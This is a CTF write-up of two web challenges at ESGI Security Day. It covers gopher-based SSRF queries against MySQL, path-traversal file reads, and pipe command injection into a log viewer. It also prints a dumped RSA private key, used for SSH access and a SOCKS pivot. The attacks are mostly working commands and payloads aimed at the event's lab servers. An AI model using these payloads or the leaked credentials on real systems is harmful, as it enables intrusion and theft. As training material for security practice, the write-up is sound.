HackLab ESGI Security Day 7th Edition - Write-ups

Table of contents
  1. 🔗Information
    1. 🔗CTF
  2. 🔗100 - Rookie - Web
  3. 🔗(unsolved) 350 - My Name is Rookie - Web

🔗Information

🔗CTF

  • Name : ESGI Security Day 7th Edition
  • Website : ctf.hacklab-esgi.org
  • Type : Online/On-site
  • Format : Jeopardy

🔗100 - Rookie - Web

(▀̿Ĺ̯▀̿ ̿)

M0th3r >Hey bah quoi ? Tu t’attendais au grand M0th3r légendaire. Désolé de te décevoir. Il parait que tu veux servir la cause ? Tu m'as trouvé mais c'est pas encore gagné. C'est pas dit que j'te prenne sous mon aisselle.

Tiens, entraîne toi, et on verra peut être si t'as l'étoffe d'un Pirate Cybernétique.

ctf.hacklab-esgi.org:8082

There is an SSRF, let's dump source code of the challenge:

curl -v 'file:///proc/self/cwd/index.php'

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php 
include_once "config_test.php";
?>

<html>
<head>
<title>Super curling</title>
<meta charset="utf-8" />
<style type="text/css">
body {
text-align: center;
background-color: #a0a0a0;
font-family: "Gill Sans Extrabold", sans-serif;
}
</style>
</head>
<body>
<h1>Website checker</h1>
<p>Nous utilisons une nouvelle technologie parfaitement sûre pour tester vos divers sites internet. N'hésitez pas à nous donner du Dodgecoin!</p>
<form action="index.php" method="post">
URL Checker :
<input type="text" name='url' />
</form>
<?php
if (isset($_POST['url'])&&!empty($_POST['url']))
{
$url = $_POST['url'];
$content_url = getUrlContent($url);
}
else
{
$content_url = "";
}
?>
</body>
</html>

curl -v 'file:///proc/self/cwd/config_test.php'

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
// TODO: MySQL connection with "tiix" user and adding a MySQL password...

function getUrlContent($url){
//$url = safe($url);
$url = escapeshellarg($url);
$pl = "curl -v ".$url;
echo $pl;
$content = shell_exec($pl);
echo $content;
return $content;
}
?>

escapeshellarg bypass with curl are not so interesting https://github.com/kacperszurek/exploits/blob/master/GitList/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#curl

Let's try MySQL command execution through a gopher SSRF thanks to PHP wrappers:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ gopherus --exploit mysql


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: \! id

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%06%00%00%00%03%5c%21%20%69%64%01%00%00%00%01

-----------Made-by-SpyD3r-----------

The gopher SSRF worked but it seems command execution won't be possible. It confirmed we have 5.5.5-10.1.37-MariaDB-0+deb9u1 and tiix user is working without password.

Let's take a look at the current DB:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
gopherus --exploit mysql


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW DATABASES

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%0f%00%00%00%03%53%48%4f%57%20%44%41%54%41%42%41%53%45%53%01%00%00%00%01

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
gopherus --exploit mysql


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW TABLES from securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%1d%00%00%00%03%53%48%4f%57%20%54%41%42%4c%45%53%20%66%72%6f%6d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
gopherus --exploit mysql


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: SHOW COLUMNS FROM nothinghere FROM securityday

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2f%00%00%00%03%53%48%4f%57%20%43%4f%4c%55%4d%4e%53%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%20%46%52%4f%4d%20%73%65%63%75%72%69%74%79%64%61%79%01%00%00%00%01

-----------Made-by-SpyD3r-----------

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ gopherus --exploit mysql


________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/

author: $_SpyD3r_$

For making it work username should not be password protected!!!

Give MySQL username: tiix
Give query to execute: USE securityday; SELECT flag FROM nothinghere

Your gopher link is ready to do SSRF :

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%74%69%69%78%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%2e%00%00%00%03%55%53%45%20%73%65%63%75%72%69%74%79%64%61%79%3b%20%53%45%4c%45%43%54%20%66%6c%61%67%20%46%52%4f%4d%20%6e%6f%74%68%69%6e%67%68%65%72%65%01%00%00%00%01

-----------Made-by-SpyD3r-----------

Flag was ESGI{W3lC0me_R00ki3_M0th3r_1s_0ld}.

🔗(unsolved) 350 - My Name is Rookie - Web

(ง ͠° ͟ل͜ ͡°)ง

M0th3r > Quelque chose me perturbe. Comment un Androïde a pu passer le test des pirates cybernétique. Duke le premier de son genre n’a été crée par personne du gouvernement. Aujourd’hui disparu je veux retrouver son core. Si tu veux m’aider, tu dois passer le test des pirate Cybernétique. C’est le test que Duke-083 a passé haut la main. Récupère tout ce que tu sais sur Zedcorp.

http = ctf.hacklab-esgi.org:5008 ssh = ctf.hacklab-esgi.org:5007

Warning: I didn't managed to go to teh last part of the challenge.

1
2
3
4
5
6
7
$ curl http://ctf.hacklab-esgi.org:5008/robots.txt
User-agent: *
Disallow: /assets
Disallow: /js
Disallow: /api
Disallow: /logs
Disallow: /images

In the file http://ctf.hacklab-esgi.org:5008/logs/access.log we can see a POST and GET requests to /0cc175b9c0f1b6a831c399e269772661/admin.php.

We also found http://ctf.hacklab-esgi.org:5008/login.php.

In access-details.log we get admin credentials: admin / pxrAW7a4HNMBw86bc.

On the admin dashboard there is a TODO list:

Todo

  • Finish log functionality.
    • Monitor login POST data from modsecurity log.
    • Create script to detect spam.
  • Implement contact functionality.
  • Create script to generate ssh key all 2 weeks.

We can also display 3 logs: access, error, and other vhosts access.

A typical request is:

1
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=error.log'

Trying a path traversal LFI we get the wanted file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../etc/passwd'

...

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:110::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
test:x:1001:1001:,,,:/home/test:/usr/sbin/nologin
trobin:x:1004:1004:Thibaud Robin,8,0145674356,0145674356,Trainee full stack developer:/home/trobin:/bin/bash

...

We may use trobin for ssh access.

We have only the last 10 lines of the file disclosed, the log filename must be appended to a default tail but hopefully we can append options to tail.

However there is a filter, we can't send a semi-colon ; or a null byte %00.

Let's try to disclose source of the challenge:

1
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php#' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Cookie: session=68696d2e-5217-4763-a18b-dafda6bc94ee; _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=1me229i20g2cvjfgcffpunseu7' --data 'log=../../../../../../../var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php -n 10000'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
<?php
session_start();
if (!isset($_SESSION['logged'])) {
header('Location: ../index.php');
die();
}
?>

<!DOCTYPE HTML>
<html>
<head>
<title>My Personnal Website - Admin</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<link rel="stylesheet" href="../assets/css/main.css" />
<noscript><link rel="stylesheet" href="../assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">

<!-- Wrapper -->
<div id="wrapper">

<!-- Header -->
<header id="header">
<a href="../index.html" class="logo"><strong>My Personnal Website</strong></a>
<nav>
<a href="#menu">Menu</a>
</nav>
</header>

<!-- Menu -->
<nav id="menu">
<ul class="links">
<li><a href="../index.html">Home</a></li>
</ul>
</nav>

<!-- Main -->
<div id="main" class="alt" style="border-color:transparent;">

<!-- One -->
<section id="one">
<div class="inner">
<header class="major">
<h1>Admin panel</h1>
</header>

<!-- Content -->
<h4>Todo</h4>
<ol>
<li>Finish log functionality.</li>
<ul style="margin:0 0 0 0">
<li>Monitor login POST data from modsecurity log.</li>
<li>Create script to detect spam.</li>
</ul>
<li>Implement contact functionality.</li>
<li>Create script to generate ssh key all 2 weeks.</li>
</ol>

<hr>

<h4>Log</h4>
<form method="post" action="#">
<div class="col-4 col-12-small">
<input type="radio" name="log" id="access" value="access.log" checked>
<label for="access">Access</label>
</div>
<div class="col-4 col-12-small">
<input type="radio" name="log" id="error" value="error.log">
<label for="error">Error</label>
</div>
<div class="col-4 col-12-small">
<input type="radio" name="log" id="vhost" value="other_vhosts_access.log">
<label for="vhost">Other vhosts access</label>
</div>
<br>
<input type="submit" value="Show" class="secondary" />
</form>

<?php
if (isset($_POST['log']) && !empty($_POST['log'])) {

if (preg_match("/[\"'-,;#]+/", $_POST['log'])) {
echo "<p><strong style='color:#e74c3c;'>Error : use of forbidden chars...</strong></p>";

} else {
$cmd = "tail -n 10 /var/log/apache2/" . $_POST['log'];
echo "<pre><code>";
system($cmd . " &");
echo "</code></pre>";
}
}
?>
</div>
</section>

</div>
</div>

<!-- Scripts -->
<script src="../assets/js/jquery.min.js"></script>
<script src="../assets/js/jquery.scrolly.min.js"></script>
<script src="../assets/js/jquery.scrollex.min.js"></script>
<script src="../assets/js/browser.min.js"></script>
<script src="../assets/js/breakpoints.min.js"></script>
<script src="../assets/js/util.js"></script>
<script src="../assets/js/main.js"></script>

</body>
</htm>

The filtering regex is the following: preg_match("/[\"'-,;#]+/", $_POST['log'].

I can also dump login.php:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
<?php
session_start();
?>

<!DOCTYPE HTML>
<html>
<head>
<title>Elements - Forty by HTML5 UP</title>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
<link rel="stylesheet" href="assets/css/main.css" />
<noscript><link rel="stylesheet" href="assets/css/noscript.css" /></noscript>
</head>
<body class="is-preload">

<!-- Wrapper -->
<div id="wrapper">

<!-- Header -->
<header id="header">
<a href="index.php" class="logo"><strong>My Personnal Website</strong></a>
<nav>
<a href="#menu">Menu</a>
</nav>
</header>

<!-- Menu -->
<nav id="menu">
<ul class="links">
<li><a href="index.php">Home</a></li>
</ul>
</nav>

<!-- Main -->
<div id="main" class="alt" style="border-color:transparent;">

<!-- One -->
<section id="one">
<div class="inner">
<header class="major">
<h1>Authentication</h1>
</header>

<?php
if (isset($_POST['username']) && isset($_POST['password'])) {
$username = htmlentities($_POST['username']);
$password = htmlentities($_POST['password']);

if ($username === "admin" && $password === "pxrAW7a4HNMBw86bc") {
$_SESSION['logged'] = 1;
header('Location: 0cc175b9c0f1b6a831c399e269772661/admin.php');

} else if (preg_match("/[\"'-,#]+/", "$username $password")) {
echo "<p><strong style='color:#e74c3c;'>Hey ! Do you try to hack me ?!</strong></p>";
} else {
echo "<p><strong style='color:#e74c3c;'>Error : incorrect credentials !</strong></p>";
}
}
?>

<form method="post" action="login.php">
<div class="row gtr-uniform">
<div class="col-10">
<input type="text" name="username" value="" placeholder="Username" />
</div>
<div class="col-10">
<input type="password" name="password" value="" placeholder="Password" />
</div>
<div class="" lass="col-12">
<input type="submit" value="Connection" class="primary" />
</div>
</div>
</form>
</div>
</section>

</div>
</div>

<!-- Scripts -->
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/jquery.scrolly.min.js"></script>
<script src="assets/js/jquery.scrollex.min.js"></script>
<script src="assets/js/browser.min.js"></script>
<script src="assets/js/breakpoints.min.js"></script>
<script src="assets/js/util.js"></script>
<script src="assets/js/main.js"></script>

</body>
</html>

Let's see /etc/hosts to find info on Zedcorp.

1
2
3
4
5
6
7
8
9
10
11
127.0.0.1    localhost
127.0.1.1 dev-server

10.0.0.1 dev-server dev-server.zedcorp
10.0.0.2 project-server project-server.zedcorp
10.0.0.3 admin-server admin-server.zedcorp

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

And reading proc/self/environ:

1
2
3
4
5
6
7
8
9
10
11
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
JOURNAL_STREAM=8:11700
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
INVOCATION_ID=82b54f38b32a4bbb8c9fd813d21543f6
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/0cc175b9c0f1b6a831c399e269772661

The apache configuration (/etc/apache2/apache2.conf) may help us:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
...

LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %O" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# Include of directories ignores editors' and dpkg's backup files,
# see README.Debian for details.

# Include generic snippets of statements
IncludeOptional conf-enabled/*.conf

# Include the virtual host configurations:
IncludeOptional sites-enabled/*.conf

# Enable the module.
SecRuleEngine On
SecAuditEngine RelevantOnly

# Setup logging in a dedicated file.
SecAuditLog /var/log/apache2/access-details.log

# Allow it to access requests body.
SecRequestBodyAccess on
SecAuditLogParts ABIFHZ

# Setup default action.
SecDefaultAction "nolog,noauditlog,allow,phase:2"

# Define the rule that will log the content of POST requests.
SecRule REQUEST_METHOD "POST" "id:800000,phase:2,t:none,pass,nolog,auditlog"

# Can read the logs on /logs
<Directory /var/www/html/logs>
SecRuleEngine Off
</Directory>

# Authorize command injection on admin.php
<Directory /var/www/html/0cc175b9c0f1b6a831c399e269772661/admin.php>
SecRuleEngine Off
</Directory>

We can also execute commands with a pipi |:

1
$ curl 'http://ctf.hacklab-esgi.org:5008/0cc175b9c0f1b6a831c399e269772661/admin.php' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://ctf.hacklab-esgi.org:5008/login.php' -H 'Connection: keep-alive' -H 'Cookie: _ga=GA1.2.453597140.1554498876; _gid=GA1.2.1128115114.1554498876; PHPSESSID=hffthjjq4jil8o5at2mklo4fc4' -H 'Upgrade-Insecure-Requests: 1' -H 'Cache-Control: max-age=0' -X POST --data 'log=../../../../../../../var/log/apache2/access.log -n 1 | cat /home/trobin/TODO.txt'

/home/trobin/TODO.txt

1
2
- Finish admin backend functionnality
- Clean up the server

/home/trobin/script/get-ssh-connection

1
2
3
4
5
#!/bin/bash
# Description : collect some error log
# Author : Th1b4ud

cat /var/log/auth.log | grep ssh | grep "session opened"

/home/test/.ssh/id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA1f3hWbx2726sOiwm+gg8Td2261E7QSJhQHcQFEns7Ubonx6E
+YU4BgzQt136gK42RwoGOph8H/Tu0zfjGIx9IQOIDG8VmCItfUDFCexoqoZB2cj2
9sLKgA/VZqRJiSka1+uibcyIgFnyDegbSXt42J6XL6xZaT56aq539s8M/aFSWNEf
8yTBG7k4E0ZWqexBhXDK3rNJ1veH3EcJXBjYgitDLXSS/VPE7op6MlD5q7ZdNt28
45idJ5tT+U8xrht71oGiIswxi1dXz0VvjXOIJIk1iQIyRdiGIvPpHIY+Dxw2FTHo
pi7Z3M5hjoq36LQryHjVbUVaUrvkyeQtZXeDIQIDAQABAoIBAHloJrhAwsGo6rG+
ZwaoMX6D8cmkNpgHp2Fpq4e3QWKFPmk4aX0fZd+Y2bmO6hajwEuhllMcPB/tWKoh
JQjCfCOE22UiiP/dNC3B14h/xgopTab/642oijcJxKsNPmNBHOev2mGtDyyy2y+k
pgaUtMVBhMkZYUjil5V7ErjGU7p5CCqeZUditEMKq9eAAq8oNGq84L0ZKqx4dyPN
Ai36I8Nygk1SpYBod+K7lUYDDfd+ZPR/yEVhfHP9JqLdezfpeJW7SQvgc4Fb0rEY
+tvM0IfyIR/9tB7IrfNuXG6S+UjoP5eybasUMDn0sqSGYLfaq1pFZYolneDkrpeV
9mPBoAECgYEA+LJUBHTrdKWqxtwkugg05Iu5nEMTGhUmZ4b6x2MRGeadqPF6u9+R
0eubqX+oNWAKBgtHQSzE8faLnOJ6lc2oEN6jeukCDStYg//aIaEyZf2r/uBs0+zA
QNO8CQ5dXK5sowaFPgqXZ0mIFUmtDOgSm6M3IRc4BK6nYlxClVzTs4ECgYEA3Eal
GLMBNykaR0jCD1CartiTZay6ld1rCZVJWjONDgJGtzi0tW1j7Mr5jk0dwfp7cJVu
/Dx+sc4Om/nJ3h15pvvcrKnv0kPhqXX4h+dFmz2psTKmjYjpsff0eLRJS9JHVNEb
svu/zHqzzrRsm1un3Ikcvy0lnG31sg6kJ8EXH6ECgYEApe/Wv2KD+EDRwf4BQ19W
a2gPYIQgqraR+WHG0mL3diC58Y+uJMz3rulV47KZuYNrLL05vfLxNcEbRoKW6H1g
NmFXExuFkuPpG6oLEYVM62Bm8pksA/tkC907CY/cG4sGUYB4Rv0qKHCXrByMqp/u
SoqMrjef2P/wD2EfzCkz2AECgYBIr98m6VrLUvri7vVqjFSewcTR1k+zyF7byLFt
3Hj9WG7xYvruq2w/5TK4bGYXbopxOj5naab9EVvsyF5+twc/vPiy2VjT76Z1fwJG
BmEHuy9V07r2FWnYWlQHyKYvKPJ04JPdWgmOdicDXLJCCdq4gV5FD6bLmdVrrj0p
CSSSQQKBgQCI3TUMYeR/4+86B6i2sldPVtn52QrOHeaDwRfZ1Z7TRYPY6gIvKBLd
VVU6YcP0KwZUHeUOC7qNxSCTnB7FkANad+D/7a0MGqAGCmWChS5GD6zpqhW+tKkY
zc9Ur+20TJHIwAKloaZLiMdcpdyFUQQRStXCGD6wqbw8UxGfx1Fd0g==
-----END RSA PRIVATE KEY-----
1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ chmod 0600 id_rsa
$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa
Linux dev-server 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1+deb9u1 (2018-05-07) x86_64

____ _ ___
|_ /___ __| |/ __|___ _ _ _ __
/ // -_) _` | (__/ _ \ '_| '_ \
/___\___\__,_|\___\___/_| | .__/
Dev Server |_|

[HINT] : Do you know proxychains ?
Last login: Sat Apr 6 04:20:26 2019 from 78.245.84.201
This account is currently not available.
Connection to ctf.hacklab-esgi.org closed.

This is autoclosing because test user has no shell (more exactly /usr/sbin/nologin).

By reading /etc/hostname we know we are on the dev-server. So the flag must be on the project or admin server.

1
2
10.0.0.2        project-server  project-server.zedcorp
10.0.0.3 admin-server admin-server.zedcorp

/etc/resolv.conf is configured to nameserver 192.168.122.1.

1
$ ssh test@ctf.hacklab-esgi.org -p 5007 -i id_rsa -fN -D 4321
  • -f : ssh in background
  • -N : do not execute a remote command
Share